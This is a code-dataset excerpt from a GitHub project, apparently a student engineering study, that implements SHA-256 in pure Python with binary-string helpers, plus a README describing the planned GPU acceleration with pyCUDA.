0:\n zeros_to_add = 8 - len(val) % 8\n if zeros_to_add == 0:\n return val\n\n val = 
zeros_to_add * '0' + val\n return val\n\n def extend_to_32_bit(self, val):\n if '0b' in val:\n val = val[2:]\n\n while len(val) < 32:\n val = self.add_leading_zeros('0' + val)\n\n return val[-32:]\n\n def convert_string_to_binary(self):\n ascii_collection = [(ord(c)) for c in self.msg]\n\n ascii_long_form = ''\n for char in range(len(ascii_collection)):\n without_leading_zeros = bin(ascii_collection[char])[2:] # index [2:] gets rid of the \"0b\"\n with_leading_zeros = self.add_leading_zeros(without_leading_zeros)\n ascii_long_form = ascii_long_form + with_leading_zeros\n\n self.binary_msg = ascii_long_form\n\n # append 1 (per hash function spec)\n self.binary_msg_plus_one = ascii_long_form + '1'\n\n def add_padding(self):\n # msg_length + 1 + K = 448 % 512\n msg_length_plus_1 = len(self.binary_msg_plus_one)\n\n k = 0\n while (msg_length_plus_1 + k) % 512 != 448 % 512:\n k += 1\n\n self.binary_msg_with_padding = self.binary_msg_plus_one + k * '0'\n\n # must now satisfy msg_length + 1 + K + 64 % 512 = 0\n # this is accomplished by appending the 64-bit representation of the input msg length\n msg_length_in_binary = bin(len(self.binary_msg))[2:] # index [2:] gets rid of the \"0b\"\n msg_length_padding = 0\n while len(msg_length_in_binary) + msg_length_padding < 64:\n msg_length_padding += 1\n\n self.binary_msg_with_padding_and_length = self.binary_msg_with_padding + msg_length_padding*'0' + msg_length_in_binary\n\n def pre_process(self):\n self.convert_string_to_binary()\n self.add_padding()\n self.break_message_into_chunks()\n\n def get_msg_length(self):\n return len(self.binary_msg_with_padding_and_length)\n\n def break_message_into_chunks(self):\n chunk_count = int(self.get_msg_length() / 512)\n\n for i in range(chunk_count):\n self.chunks.append(self.binary_msg_with_padding_and_length[(i*512):((i+1)*512)])\n # print(f'found {len(self.chunks)} chunks in self.chunks, the chunk count is {chunk_count}')\n\n # this function can be done on GPU\n def copy_chunk_bits(self, new_chunk=None):\n self.w = ['0'*32] * 64\n if new_chunk is None:\n chunk = self.binary_msg_with_padding_and_length[0:512]\n else:\n chunk = new_chunk\n\n\n for i in range(16): # 16 = 512-bit chunk / 32-word segments\n self.w[i] = (chunk[(i*32):((i+1)*32)]) # copy the 32-bit range i*32 to (i+1)*32\n\n # this can be done on a gpu as well\n def extend_words(self):\n for i in range(16, 64): # now extend the rest of w[]\n s0_p1 = logic.rotate_bits(self.w[i-15], 7)\n s0_p2 = logic.rotate_bits(self.w[i-15], 18)\n s0_p3 = logic.shift_bits(self.w[i-15], 3)\n s0_xor1 = logic.xor_binary_strings(s0_p1, s0_p2)[2:]\n s0 = logic.xor_binary_strings(s0_xor1, s0_p3)\n s0 = self.extend_to_32_bit(s0)\n\n s1_p1 = logic.rotate_bits(self.w[i-2], 17)\n s1_p2 = logic.rotate_bits(self.w[i-2], 19)\n s1_p3 = logic.shift_bits(self.w[i-2], 10)\n s1_xor1 = logic.xor_binary_strings(s1_p1, s1_p2)[2:]\n s1 = logic.xor_binary_strings(s1_xor1, s1_p3)\n s1 = self.extend_to_32_bit(s1)\n\n add1 = logic.add_binary_strings(self.w[i-16], s0)\n add1 = self.extend_to_32_bit(add1)\n\n add2 = logic.add_binary_strings(self.w[i-7], s1)\n add2 = self.extend_to_32_bit(add2)\n\n\n w_i_no_padding = logic.add_binary_strings(add1, add2)\n w_i_no_padding = self.extend_to_32_bit(w_i_no_padding)\n\n\n # truncate overflow bits - cap at 32 bits\n w_i = logic.and_binary_strings(w_i_no_padding, '11111111111111111111111111111111')[2:]\n w_i = self.extend_to_32_bit(w_i)\n\n self.w[i] = w_i\n\n def compress(self):\n # this compression function happens for every 512-bit chunk,\n # so after 
one 512-bit chunk is compressed, it calls this function\n # for the next chunk to be process with the updated 'h' list\n\n # initialize working registers / variables\n a = self.h[0]\n b = self.h[1]\n c = self.h[2]\n d = self.h[3]\n e = self.h[4]\n f = self.h[5]\n g = self.h[6]\n h = self.h[7]\n\n for i in range(64):\n\n # S1\n e_rot_6 = logic.rotate_bits(e, 6)\n e_rot_11 = logic.rotate_bits(e, 11)\n e_rot_25 = logic.rotate_bits(e, 25)\n s1_xor_1 = logic.xor_binary_strings(e_rot_6, e_rot_11)\n _S1 = logic.xor_binary_strings(s1_xor_1, e_rot_25)[2:]\n _S1 = self.extend_to_32_bit(_S1)\n\n # ch\n e_and_f = logic.and_binary_strings(e, f)\n not_e = logic.not_binary_string(e)\n ch_and_1 = logic.and_binary_strings(not_e, g)\n _ch = logic.xor_binary_strings(e_and_f, ch_and_1)[2:]\n _ch = self.extend_to_32_bit(_ch)\n\n # temp1\n add_1 = logic.add_binary_strings(h, _S1)\n add_1 = logic.and_binary_strings(add_1, '11111111111111111111111111111111')[2:]\n add_2 = logic.add_binary_strings(_ch, self.extend_to_32_bit(bin(self.k[i])[2:]))\n add_2 = logic.and_binary_strings(add_2, '11111111111111111111111111111111')[2:]\n add_3 = logic.add_binary_strings(add_1, add_2)\n add_3 = logic.and_binary_strings(add_3, '11111111111111111111111111111111')[2:]\n _temp1 = logic.add_binary_strings(add_3, self.w[i])\n _temp1 = logic.and_binary_strings(_temp1, '11111111111111111111111111111111')[2:]\n _temp1 = self.extend_to_32_bit(_temp1)\n\n # S0\n a_rot_2 = logic.rotate_bits(a, 2)\n a_rot_13 = logic.rotate_bits(a, 13)\n a_rot_22 = logic.rotate_bits(a, 22)\n s0_xor_1 = logic.xor_binary_strings(a_rot_2, a_rot_13)\n _S0 = logic.xor_binary_strings(s0_xor_1, a_rot_22)[2:]\n _S0 = self.extend_to_32_bit(_S0)\n\n # maj\n a_and_b = logic.and_binary_strings(a, b)\n a_and_c = logic.and_binary_strings(a, c)\n b_and_c = logic.and_binary_strings(b, c)\n maj_xor_1 = logic.xor_binary_strings(a_and_b, a_and_c)\n _maj = logic.xor_binary_strings(maj_xor_1, b_and_c)[2:]\n _maj = self.extend_to_32_bit(_maj)\n\n # temp2\n _temp2 = logic.and_binary_strings(logic.add_binary_strings(_S0, _maj)[2:], '11111111111111111111111111111111')[2:]\n _temp2 = self.extend_to_32_bit(_temp2)\n\n # Every ADD operation must & 0xFFFFFFFF (in case of overflow) and be extended back to 32 bits (in case < 32 bits)\n h = self.extend_to_32_bit(g)\n g = self.extend_to_32_bit(f)\n f = self.extend_to_32_bit(e)\n e = logic.and_binary_strings(logic.add_binary_strings(d, _temp1)[2:], '11111111111111111111111111111111')[2:]\n e = self.extend_to_32_bit(e)\n\n d = self.extend_to_32_bit(c)\n c = self.extend_to_32_bit(b)\n b = self.extend_to_32_bit(a)\n a = logic.and_binary_strings(logic.add_binary_strings(_temp1, _temp2)[2:], '11111111111111111111111111111111')[2:]\n a = self.extend_to_32_bit(a)\n\n self.h[0] = logic.and_binary_strings(logic.add_binary_strings(self.h[0], a)[2:],\n '11111111111111111111111111111111')[2:]\n self.h[0] = self.extend_to_32_bit(self.h[0])\n\n self.h[1] = logic.and_binary_strings(logic.add_binary_strings(self.h[1], b)[2:],\n '11111111111111111111111111111111')[2:]\n self.h[1] = self.extend_to_32_bit(self.h[1])\n\n self.h[2] = logic.and_binary_strings(logic.add_binary_strings(self.h[2], c)[2:],\n '11111111111111111111111111111111')[2:]\n self.h[2] = self.extend_to_32_bit(self.h[2])\n\n self.h[3] = logic.and_binary_strings(logic.add_binary_strings(self.h[3], d)[2:],\n '11111111111111111111111111111111')[2:]\n self.h[3] = self.extend_to_32_bit(self.h[3])\n\n self.h[4] = logic.and_binary_strings(logic.add_binary_strings(self.h[4], e)[2:],\n 
'11111111111111111111111111111111')[2:]\n self.h[4] = self.extend_to_32_bit(self.h[4])\n\n self.h[5] = logic.and_binary_strings(logic.add_binary_strings(self.h[5], f)[2:],\n '11111111111111111111111111111111')[2:]\n self.h[5] = self.extend_to_32_bit(self.h[5])\n\n self.h[6] = logic.and_binary_strings(logic.add_binary_strings(self.h[6], g)[2:],\n '11111111111111111111111111111111')[2:]\n self.h[6] = self.extend_to_32_bit(self.h[6])\n\n self.h[7] = logic.and_binary_strings(logic.add_binary_strings(self.h[7], h)[2:],\n '11111111111111111111111111111111')[2:]\n self.h[7] = self.extend_to_32_bit(self.h[7])\n\n\n def digest(self):\n # print(f'found {len(self.chunks)} chunks in self.chunks')\n for chunk in self.chunks:\n \n hash_pre = time.time()\n self.copy_chunk_bits(chunk)\n hash_post = time.time()\n self.timer = hash_post-hash_pre\n \n self.extend_words()\n self.compress()\n self.digest = ''\n for h in self.h:\n hex_h = hex(logic.binary_string_to_binary_int(h))\n hex_h_length = len(hex_h)\n hex_h = str(hex_h)[2:]\n if len(hex_h) < 8:\n hex_h = self.add_leading_zeros(hex_h)\n self.digest += hex_h\n\n return self.digest\n" }, { "alpha_fraction": 0.7552973628044128, "alphanum_fraction": 0.782638430595398, "avg_line_length": 53.03703689575195, "blob_id": "481e13f85265035419bc6282584774327414e376", "content_id": "b0eb6e03cae538a447cda0bba2a2245a36a3f02b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1463, "license_type": "permissive", "max_line_length": 185, "num_lines": 27, "path": "/README.md", "repo_name": "ChristopheBrown/HASH", "src_encoding": "UTF-8", "text": "# HASH\n\nHASH stands for Hardware Acceleration of Secure Hashing. This repo is an engineering study of SHA-256 algorithm parallelized using python and pyCUDA. \n\n* Github repository: https://github.com/ChristopheBrown/HASH\n* Website: https://cb3534e4750hash.weebly.com/\n\nThe cpu source code (developed with anaconda python 3.7) implementation adapts from the SHA-256 wikipedia artcile pseudocode here: https://en.wikipedia.org/wiki/SHA-2#Pseudocode\n\ncontact: [email protected]\n\nThe cpu implementation is unit tested and is consistent with hashing algorithms that can be found online.\n\nTo run: \n\n* Ensure CUDA, Python, matplotlib, and numpy are installed and runnable on your machine.\n* Clone this repo\n* Open \"gpu/sha256.py\" and modify the \"files\" array in __main__ to run the code with whichever files you like. Large files will take longer\n* Run \"python sha256.py\"\n* Optional, modify the matplotlib code at the bottom to produce graphs. By default, the plot for the execution time of the copy phase will display. 
More details are in the included PDF.\n\n\nUseful links in making this:\n * SHA-256 calculator: https://xorbin.com/tools/sha256-hash-calculator\n * Decimal-Hex-Binary converter: https://www.mathsisfun.com/binary-decimal-hexadecimal-converter.html\n * Examples used for unit testing: https://csrc.nist.gov/csrc/media/projects/cryptographic-standards-and-guidelines/documents/examples/sha256.pdf\n * Step-by-step SHA-256: https://tools.ietf.org/html/rfc4634#page-6\n \n \n" }, { "alpha_fraction": 0.6149674654006958, "alphanum_fraction": 0.6247288584709167, "avg_line_length": 23.91891860961914, "blob_id": "a4a5391e6c56524e13568289b379be6913064c71", "content_id": "806a2fb49c29a5ad0046e371e5fd9730dde44b69", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 922, "license_type": "permissive", "max_line_length": 87, "num_lines": 37, "path": "/cpu/sha256.py", "repo_name": "ChristopheBrown/HASH", "src_encoding": "UTF-8", "text": "import helper\n\n\nclass SHA256:\n msg = None\n chunks = None\n message_length = None\n\n def __init__(self, message):\n self.hasher = helper.Helper(message)\n\n self.msg = message\n self.message_length = len(message)\n\n def preprocess(self):\n self.hasher.pre_process()\n self.msg = self.hasher.binary_msg_with_padding_and_length\n self.chunks = self.hasher.chunks\n\n def copy_chunks(self):\n self.hasher.copy_chunk_bits()\n self.hasher.extend_words()\n\n def compression_function(self):\n self.hasher.compress()\n\n def digest(self):\n return self.hasher.digest()\n\n\nif __name__ == '__main__':\n message = 'the quick brown fox jumped over the lazy dog'\n\n s = SHA256(message)\n s.preprocess()\n # ensure your version of python supports the statement below\n print('input message is: {} \\ndigest (SHA-256) is: {}'.format(message, s.digest()))\n" } ]
7
smckisson/Barcode-scanner-Front-End
https://github.com/smckisson/Barcode-scanner-Front-End
306e4f908fc91c0cd4574ed27f2e67d49911662a
c99d756c5fc3f2f7ae0ac7855fc36a08e86802b3
ae90115705f9ed38509a535edb4b0bd0b5755fce
refs/heads/master
2021-01-13T13:32:53.871210
2016-12-06T02:11:01
2016-12-06T02:11:01
72,587,067
0
0
null
2016-11-01T23:56:13
2016-10-27T00:35:57
2016-11-01T23:30:22
null
[ { "alpha_fraction": 0.5375191569328308, "alphanum_fraction": 0.5773353576660156, "avg_line_length": 25.1200008392334, "blob_id": "b387d0af3db7f2ed8ecb59e1af22bdb6ff18a7c6", "content_id": "9f2026e560ef64b79822baaad27d8d98d97dde4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 653, "license_type": "no_license", "max_line_length": 77, "num_lines": 25, "path": "/questions/migrations/0002_auto_20161116_2217.py", "repo_name": "smckisson/Barcode-scanner-Front-End", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10 on 2016-11-16 22:17\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('questions', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='item',\n name='item_barcode_num',\n field=models.CharField(default=' ', max_length=200),\n ),\n migrations.AlterField(\n model_name='location',\n name='loc_barcode_num',\n field=models.CharField(default=' ', max_length=200, unique=True),\n ),\n ]\n" }, { "alpha_fraction": 0.5559219717979431, "alphanum_fraction": 0.5702115893363953, "avg_line_length": 43.925926208496094, "blob_id": "efa6d3b94bbca62d71966d7b3c5383c57e73c49c", "content_id": "83ab280683075516243ee3ca0c6aedf8f8b951b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3639, "license_type": "no_license", "max_line_length": 135, "num_lines": 81, "path": "/questions/migrations/0001_initial.py", "repo_name": "smckisson/Barcode-scanner-Front-End", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.3 on 2016-11-15 16:15\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Choice',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('choice_text', models.CharField(max_length=200)),\n ('time_scanned', models.CharField(default=' ', max_length=200)),\n ('person_scanned', models.CharField(default=' ', max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='Device',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('device_name', models.CharField(max_length=200)),\n ('manufacturer', models.CharField(max_length=200)),\n ('model_number', models.CharField(max_length=200)),\n ('type_equip', models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='Item',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('item_barcode_num', models.IntegerField(default=0)),\n ('item_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='questions.Device')),\n ],\n ),\n migrations.CreateModel(\n name='Location',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('loc_barcode_num', models.IntegerField(default=0, unique=True)),\n ('loc_name', models.CharField(default=' ', max_length=200)),\n ('admin', models.CharField(max_length=200)),\n ('user_assigned', models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='LocDev',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, 
serialize=False, verbose_name='ID')),\n ('device', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='questions.Device')),\n ('location', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='questions.Location')),\n ],\n ),\n migrations.CreateModel(\n name='Question',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('question_text', models.CharField(max_length=200)),\n ('item_assoc', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='questions.Device')),\n ('location_assoc', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='questions.Location')),\n ],\n ),\n migrations.AddField(\n model_name='choice',\n name='location',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='questions.Location'),\n ),\n migrations.AddField(\n model_name='choice',\n name='question',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='questions.Question'),\n ),\n ]\n" }, { "alpha_fraction": 0.739130437374115, "alphanum_fraction": 0.739130437374115, "avg_line_length": 8.199999809265137, "blob_id": "faf32980579f81f4f25d7258ff693f01f6f39c06", "content_id": "d977d7cab59211351cea35904471cafe431d3391", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 46, "license_type": "no_license", "max_line_length": 26, "num_lines": 5, "path": "/README.md", "repo_name": "smckisson/Barcode-scanner-Front-End", "src_encoding": "UTF-8", "text": "Front END\n\nrun-> \n\npython manage.py runserver\n" } ]
3
yvedeng/DailyCoding
https://github.com/yvedeng/DailyCoding
d9a49170152cf4840a434028e07990e7f27d94c0
16ee4ad3b713455be3f42df52dce99035a4b9fab
4f4257471aa6fafd1c74d7d8ef6a190bcded6ba4
refs/heads/master
2020-04-26T21:10:15.879579
2019-08-19T22:31:30
2019-08-19T22:31:30
173,834,327
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5634408593177795, "alphanum_fraction": 0.5677419304847717, "avg_line_length": 21.190475463867188, "blob_id": "75896263fa2cfcabfbfae320c45f5e88a02a3640", "content_id": "e7552fdd7654c2ab799615d4a398b9c151590b24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 465, "license_type": "no_license", "max_line_length": 65, "num_lines": 21, "path": "/19Aug2019/Solution.py", "repo_name": "yvedeng/DailyCoding", "src_encoding": "UTF-8", "text": "import math\n\n\nclass Solution:\n\n def lengthOfLongestSubstring(self, s):\n # Fill this in.\n indexDict = {}\n substring = ''\n max_length = 0\n for c in s:\n if c not in indexDict:\n indexDict[c] = 1\n substring += c\n else:\n max_length = max(len(substring), max_length)\n indexDict = {}\n substring = ''\n return max_length\n\nprint(Solution().lengthOfLongestSubstring('abrkaabcdefghijjxxx'))" }, { "alpha_fraction": 0.4725568890571594, "alphanum_fraction": 0.515394926071167, "avg_line_length": 24.724138259887695, "blob_id": "dac83d097c060a29090b86f8cdf242c3d56a718c", "content_id": "45c174a37a1b8f28f291ffc15055e7bbbeee49a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 747, "license_type": "no_license", "max_line_length": 77, "num_lines": 29, "path": "/18Aug2019/Solution.py", "repo_name": "yvedeng/DailyCoding", "src_encoding": "UTF-8", "text": "from ListNode import ListNode\n\n\nclass Solution:\n\n def addTwoNumbers(self, l1, l2, c=0):\n\n result = ListNode(0)\n result.val = (l1.val + l2.val) + c\n\n if result.val >= 10:\n result.val = l1.val + l2.val - 10 + c\n c = 1 # more than 9, carry digit = 1\n else:\n c = 0 # less than 10, carry digit = 0\n\n if l1.next is None and l2.next is None:\n if c != 0:\n result.next = self.addTwoNumbers(ListNode(0), ListNode(0), c)\n return result\n\n if l1.next is None:\n l1.next = ListNode(0)\n if l2.next is None:\n l2.next = ListNode(0)\n\n result.next = self.addTwoNumbers(l1.next, l2.next, c)\n\n return result\n\n" }, { "alpha_fraction": 0.5665295124053955, "alphanum_fraction": 0.6104252338409424, "avg_line_length": 28.1200008392334, "blob_id": "f2c32d048ce9dfff8867d56dfda026334cde4961", "content_id": "e57332d8c2635a131ce71a31f5e81e0e667777c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 729, "license_type": "no_license", "max_line_length": 101, "num_lines": 25, "path": "/18Aug2019/Test.py", "repo_name": "yvedeng/DailyCoding", "src_encoding": "UTF-8", "text": "import random\nfrom Helper import *\nfrom colorama import Style, Fore, init\n\ninit()\n\nn = 10000\nn_success = 0\nn_failure = 0\nprint(f\"{Style.BRIGHT}Self generating {n} test cases: {Style.RESET_ALL}\")\n\nfor i in range(n):\n num1 = random.randint(1, 100000)\n num2 = random.randint(1, 100000)\n result = NodeToNumber(Solution().addTwoNumbers(NumberToNode(str(num1)), NumberToNode(str(num2))))\n print(f\"{i+1}: {num1} + {num2} = {result}\")\n if num1 + num2 == result:\n print(f\"{Fore.LIGHTGREEN_EX}passed\")\n n_success += 1\n else:\n print(f\"{Fore.RED}failed\")\n n_failure += 1\n print(f\"{Fore.RESET}------------------------------\")\n\nprint(f\"{Fore.CYAN}Success: {n_success}\\nFailure: {n_failure}\")\n\n" }, { "alpha_fraction": 0.5761494040489197, "alphanum_fraction": 0.6034482717514038, "avg_line_length": 20.121212005615234, "blob_id": "c0c3304bd54ca1d1adabefdab525e7ba1ec85993", "content_id": "9ee0d6202d607f93901684e9abee8f5a3abe1ef5", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 696, "license_type": "no_license", "max_line_length": 46, "num_lines": 33, "path": "/18Aug2019/Helper.py", "repo_name": "yvedeng/DailyCoding", "src_encoding": "UTF-8", "text": "from ListNode import ListNode\nfrom Solution import Solution\n\ndef NodeToNumber(node, n=0, c=0):\n n += pow(10, c) * node.val\n c += 1\n if node.next is None:\n return n\n else:\n return NodeToNumber(node.next, n, c)\n\ndef NumberToNode(str_num):\n node = ListNode(0)\n if len(str_num) == 0:\n return node\n else:\n node.val = int(str_num[-1])\n node.next = NumberToNode(str_num[:-1])\n return node\n\n\n# l1 = ListNode(9)\n#\n# l2 = ListNode(5)\n# l2.next = ListNode(6)\n# l2.next.next = ListNode(5)\n#\n# result = Solution().addTwoNumbers(l1, l2)\n# print(NodeToNumber(result))\n#\n# while result is not None:\n# print(result.val)\n# result = result.next" }, { "alpha_fraction": 0.8363636136054993, "alphanum_fraction": 0.8363636136054993, "avg_line_length": 26.5, "blob_id": "aa555ba6461d229c85feff477ebca91338872457", "content_id": "d26b24bc025b9f1f6f8361ec5678479aa1f61e01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 55, "license_type": "no_license", "max_line_length": 40, "num_lines": 2, "path": "/README.md", "repo_name": "yvedeng/DailyCoding", "src_encoding": "UTF-8", "text": "# DailyCoding\nOnly used for solving algorithm problems\n" } ]
5
GlauberGoncalves/scanner
https://github.com/GlauberGoncalves/scanner
62e6c354331abbf099791c9e8c17eb30602baf57
f62dbbab1c2b65730f1d89537f33b7d63336a3b0
e4c37870312494e9f39de90af39ed29dc145dfe5
refs/heads/master
2021-01-11T09:47:07.912143
2017-01-02T19:35:01
2017-01-02T19:35:01
77,665,425
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.44175440073013306, "alphanum_fraction": 0.48140349984169006, "avg_line_length": 26.95098114013672, "blob_id": "d082266e47bb515d9616d4be92d69250a6fad26b", "content_id": "9992a523c25966c27f9ff3a8acc1e80f9a3f5a22", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2858, "license_type": "permissive", "max_line_length": 82, "num_lines": 102, "path": "/scanner.py", "repo_name": "GlauberGoncalves/scanner", "src_encoding": "UTF-8", "text": "from tkinter import *\nimport socket\nimport os, platform\n\n#\n# Função ping retorna true se IP estiver ativo na rede e False se não estiver\n#-------------------------------------------------------------------------------#\n\ndef ping(host): \n # ping de acordo com SO\n ping_str = \"-n 1\" if platform.system().lower()==\"windows\" else \"-c 1\"\n\n # Ping\n relatorio = (os.popen(\"ping -n 1 \"+host).read())\n if (relatorio[-5]+relatorio[-4]) != 'da':\n return True\n else: return False\n#\n# retorna uma lista com cada valor do ip\n#-------------------------------------------------------------------------------#\ndef iphost(host):\n ip = socket.gethostbyname(host)\n ip = ip.split('.')\n return ip\n#\n# \n#-------------------------------------------------------------------------------#\ndef verifAparelho(ip,dmin,dmax,cmin,cmax):\n if(ip[0] == '10'):\n for i in range(dmin,dmax+1):\n ip[3] = str(i)\n mont = ip[0]+\".\"+ip[1]+\".\"+ip[2]+\".\"+ip[3]\n print(mont)\n if(ping(mont)):\n visor.insert('insert',\"AP ativo: \" + mont + \"\\n\")\n janela.update() \n else:\n for i in range(cmin,cmax+1): \n ip[3] = str(i)\n mont = ip[0]+\".\"+ip[1]+\".\"+ip[2]+\".\"+ip[3]\n print(mont)\n if(ping(mont)):\n visor.insert('insert',\"AP ativo: \" + mont + \"\\n\")\n janela.update()\n\n#\n# \n#-------------------------------------------------------------------------------#\n \n#\n# Layout do sistema\n#-------------------------------------------------------------------------------#\n\ndef verificaAP():\n ip = iphost(et.get())\n verifAparelho(ip,161,165,80,86)\n\ndef verificaRD():\n ip = iphost(et.get())\n verifAparelho(ip,166,175,87,89)\n\ndef verificaTM():\n ip = iphost(et.get())\n verifAparelho(ip,176,189,234,246)\n\ndef verificaTD():\n ip = iphost(et.get())\n verificaAP()\n verificaTM()\n verificaRD()\n\n# configuração da janela\njanela = Tk()\njanela.geometry(\"485x400+400+200\")\njanela[\"bg\"] = \"#2196f3\"\njanela.title(\"Scan de Rede - Nimal Tecnologia\")\n\n# config botões\nbtn1 = Button(janela, text=\"Access point\", bg=\"white\", command=verificaAP)\nbtn2 = Button(janela, text=\"Rádio Frequencia\", bg=\"white\", command=verificaRD)\nbtn3 = Button(janela, text=\"Terminal de consulta\", bg=\"white\", command=verificaTM)\nbtn4 = Button(janela, text=\"Todos\", bg=\"white\", command=verificaTD)\n\nbtn1.place(x=10, y=40)\nbtn2.place(x=90, y=40)\nbtn3.place(x=195, y=40)\nbtn4.place(x=320, y=40)\n\n# label\nlb = Label(janela, text=\"Número da loja:\")\nlb.place(x=10, y=10)\n\nvisor = Text(janela, width=\"58\", height=20)\nvisor.place(x=10, y=70)\n\n\n# entry\net = Entry(janela, width=5)\net.place(x=110,y=10)\n\njanela.mainloop()\n#------------------------------------------------------------------------------#" }, { "alpha_fraction": 0.774193525314331, "alphanum_fraction": 0.774193525314331, "avg_line_length": 14.5, "blob_id": "a208c4f381a214a796849f386b50dbdf0c988257", "content_id": "500543f404c9177cf092d9b36a5f48f9e67e7f83", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": 
false, "language": "Markdown", "length_bytes": 31, "license_type": "permissive", "max_line_length": 20, "num_lines": 2, "path": "/README.md", "repo_name": "GlauberGoncalves/scanner", "src_encoding": "UTF-8", "text": "# scanner\nScan de rede simples\n" } ]
2
DiegoVilela/internalize
https://github.com/DiegoVilela/internalize
5a55b3b91947e20a7315125e15a010e951e02c42
d34d850f98c408974d10633bf7aaddcf23feb313
5e803fee42fa1f6cdbfd485f2c8989ad826c2b98
refs/heads/main
2023-05-04T09:01:02.209806
2021-05-26T20:07:02
2021-05-26T20:07:02
331,701,830
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7084639668464661, "alphanum_fraction": 0.7084639668464661, "avg_line_length": 29.380952835083008, "blob_id": "814a4651d54bad1f92faae7f1c2d5edf28525b1b", "content_id": "b10aedbd50c72491a774bd46f8d320679ac1e652", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 638, "license_type": "no_license", "max_line_length": 110, "num_lines": 21, "path": "/cis/mixins.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.contrib.auth.mixins import UserPassesTestMixin\n\n\nclass UserApprovedMixin(UserPassesTestMixin):\n \"\"\"\n Deny access to unapproved users.\n \"\"\"\n def test_func(self):\n return self.request.user.is_authenticated and self.request.user.is_approved\n\n\nclass AddClientMixin:\n \"\"\"\n Add the client to be saved on create views.\n\n Override form_valid() of CreateView.\n https://docs.djangoproject.com/en/stable/topics/class-based-views/generic-editing/#models-and-request-user\n \"\"\"\n def form_valid(self, form):\n form.instance.client = self.request.user.client\n return super().form_valid(form)\n" }, { "alpha_fraction": 0.5711265206336975, "alphanum_fraction": 0.5779396295547485, "avg_line_length": 34.032920837402344, "blob_id": "dbaef71e7c734e0d5b5ebbdc5a17ce1d66f2e990", "content_id": "4db781f5652dccf58b12a3b80ccf6c292769e1bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8513, "license_type": "no_license", "max_line_length": 99, "num_lines": 243, "path": "/cis/tests/tests_views.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from datetime import timedelta\nfrom collections import namedtuple\nfrom dataclasses import dataclass\nfrom django.utils import timezone\nfrom django.test import TestCase\nfrom django.shortcuts import reverse\n\nfrom ..models import Client, Place, Appliance, Manufacturer, CI, Contract\nfrom accounts.models import User\n\n\n@dataclass\nclass ListInfo:\n \"\"\"\n Wraps the details of each test.\n\n Applied to Place, Appliance, and CI.\n \"\"\"\n\n message: str\n context_object_name: str\n template_name: str\n lookup_text: str\n letter: str = 'A'\n\n @property\n def contains(self):\n return f'{self.lookup_text}{self.letter}'\n\n @property\n def not_contains(self):\n return f\"{self.lookup_text}{'B' if self.letter == 'A' else 'A'}\"\n\n\nclass PlaceApplianceAndCIViewTest(TestCase):\n \"\"\"\n Test CI, Place and Appliance views.\n \"\"\"\n\n users = {}\n places = {}\n appliances = {}\n\n @classmethod\n def setUpTestData(cls):\n \"\"\"\n Set up the database to be used in all testes in this class.\n\n Client A and Client B will have their respective User, CI, and Place.\n cls.users = {'a': user_A, 'b': user_B}\n \"\"\"\n\n manufacturer = Manufacturer.objects.create(name='Cisco')\n contract = create_contract()\n for letter in {'A', 'B'}:\n client = Client.objects.create(name=f'Client {letter}')\n place = Place.objects.create(client=client, name=f'Place Client {letter}')\n appliance = create_appliance(client, manufacturer, letter)\n create_ci(client, place, letter, contract)\n user = User.objects.create_user(f'user_{letter}', password='faith', client=client)\n cls.users.update({letter: user})\n cls.places.update({letter: place})\n cls.appliances.update({letter: appliance})\n 